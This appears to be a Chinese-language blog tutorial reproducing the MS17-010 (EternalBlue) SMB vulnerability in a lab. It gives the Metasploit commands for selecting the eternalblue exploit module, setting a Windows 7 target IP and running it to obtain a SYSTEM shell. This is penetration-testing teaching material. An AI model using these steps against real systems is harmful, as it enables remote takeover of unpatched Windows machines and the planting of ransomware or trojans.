MS17-010(永恒之蓝)漏洞复现

目录

【永恒之蓝漏洞概述】

【实验设备】

【实验思路】

【实验步骤】

​【漏洞利用】


【永恒之蓝漏洞概述】

原理:

    利用Windows系统的smb协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。永恒之蓝是在Windows的SMB服务处理smb v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

【实验设备】

      靶机:主机 * 1台 windows7    kali

【实验思路】

1、利用Meatsploit进行攻击

【实验步骤】

打开kail机器的终端,输入“msfconsole”命令进入msf内

 下面通过 msf 演示下如何利用此漏洞。首先运行命令【search 17-010】搜索 MS17-010 漏洞利用模块。

运行命令【 use exploit/windows/smb/ms17_010_eternalblue 】使用漏洞利用模块 

 进入利用模块后使用命令【show options】可查看需要配置的参数,如下图只需要指定 IP 即可。

 打开Windows7,查看IP地址

 回到kali,运行命令【set RHOSTS 192.168.179.152】设置目标 IP,然后运行 run 开始攻击。

运行 run 之后可以看到下图成功获取目标的系统权限。

 从结果来看,显示攻击成功并且拿到了shell权限了

【漏洞利用】

 执行【ipconfig】命令查看目标的网络信息。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值